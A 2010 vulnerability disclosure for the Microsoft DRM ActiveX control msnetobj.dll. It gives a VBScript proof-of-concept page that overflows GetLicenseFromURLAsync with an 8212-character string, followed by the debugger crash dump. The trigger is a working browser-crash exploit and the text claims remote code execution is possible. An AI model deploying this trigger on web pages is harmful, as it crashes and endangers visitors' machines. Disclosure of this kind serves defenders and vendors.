============================================================================================

                             Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
                     ===========================================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       www.aksitservices.co.in

# Credit by Asheesh Anaconda 

# Date 18th Sep 2010

# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities
             such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
             triggered when an attacker convinces a victim user to visit a malicious website.

             The "GetLicenseFromURLAsync" function does not handle input correctly. 
 
             Remote attackers may exploit this issue to execute arbitrary machine code in the context of
             the affected application, facilitating the remote compromise of affected computers. Failed
             exploit attempts likely result in browser crashes.

=============================================Proof Of Concept=============================================
 


<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />
<script language='vbscript'>

targetFile = "C:\Windows\System32\msnetobj.dll"
prototype  = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String ,  ByVal bstrURL As String )"
memberName = "GetLicenseFromURLAsync"
progid     = "MSNETOBJLib.RMGetLicense"
argCount   = 2

arg1="defaultV"
arg2=String(8212, "A")

RM.GetLicenseFromURLAsync(arg1 ,arg2) 

</script>
=============================================Exception details=============================================
Exception Code: ACCESS_VIOLATION
Disasm: 77BEEA7F  MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]

Seh Chain:
--------------------------------------------------
1   76E7E47D   msvcrt.dll
2   77BB99FA   ntdll.dll


Called From                   Returns To                    
--------------------------------------------------
ntdll.77BEEA7F                ntdll.77BEE9D9                
ntdll.77BEE9D9                KERNEL32.770E7F75             
KERNEL32.770E7F75             ole32.779EB3E1                
ole32.779EB3E1                ole32.779EB50A                
ole32.779EB50A                ole32.779AF6F6                
ole32.779AF6F6                ole32.779AF794                
ole32.779AF794                msnetobj.6B823726             
msnetobj.6B823726             msnetobj.6B823814             
msnetobj.6B823814             msnetobj.6B823C40             
msnetobj.6B823C40             msnetobj.6B823FA7             
msnetobj.6B823FA7             msnetobj.6B824513             
msnetobj.6B824513             msnetobj.6B823A9D             
msnetobj.6B823A9D             msvcrt.76E82599               
msvcrt.76E82599               msvcrt.76E826B3               
msvcrt.76E826B3               KERNEL32.770ED0E9             
KERNEL32.770ED0E9             ntdll.77BF19BB                
ntdll.77BF19BB                ntdll.77BF198E                


Registers:
--------------------------------------------------
EIP 77BEEA7F
EAX 00000054
EBX 00032A78 -> Asc: GsHd(
ECX 00000000
EDX 00000004
EDI 035CEE28 -> 7FFD8000
ESI 6B821434
EBP 035CEE48 -> 035CEE90
ESP 035CEE0C -> 00032A78


Block Disassembly: 
--------------------------------------------------
77BEEA68  PUSH EDI
77BEEA69  JNZ 77C25E3F
77BEEA6F  TEST BYTE PTR [EBX+10],1
77BEEA73  JE 77C25E93
77BEEA79  MOV EAX,[EBX+18]
77BEEA7C  LEA EDI,[EBP-20]
77BEEA7F  MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]    <--- CRASH
77BEEA80  PUSH 77BEEABD
77BEEA85  MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA86  PUSH 1C
77BEEA88  ADD EAX,EBX
77BEEA8A  PUSH EDX
77BEEA8B  MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA8C  PUSH EAX
77BEEA8D  LEA EAX,[EBP-20]


ArgDump:
--------------------------------------------------
EBP+8  00032A78 -> Asc: GsHd(
EBP+12  6B821434
EBP+16  035CEEB0 -> 00000040
EBP+20  00000000
EBP+24  77AC1424 -> 779EBEC8
EBP+28  6B821434


Stack Dump:
--------------------------------------------------
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03  [..............\.]
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F  [.......k........]
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03  [D.\..l.wh.\...\.]
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03  [..\...\..Y.u..\.]
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03  [...w.......k..\.]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7735d5c0     RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))
Debug String Log
--------------------------------------------------